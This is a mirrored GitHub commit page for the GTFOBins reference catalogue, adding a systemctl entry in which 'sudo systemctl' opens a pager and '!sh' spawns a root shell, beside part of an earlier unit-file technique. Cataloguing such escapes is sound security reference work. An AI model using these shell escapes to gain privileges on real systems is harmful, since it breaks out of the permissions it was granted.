mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
Add systemctl sudo shell usingpager
This commit is contained in:
parent
20607b9b3c
commit
f79b10a5f8
@ -20,4 +20,8 @@ functions:
|
||||
WantedBy=multi-user.target' > $TF
|
||||
sudo systemctl link $TF
|
||||
sudo systemctl enable --now $TF
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
sudo systemctl
|
||||
!sh
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user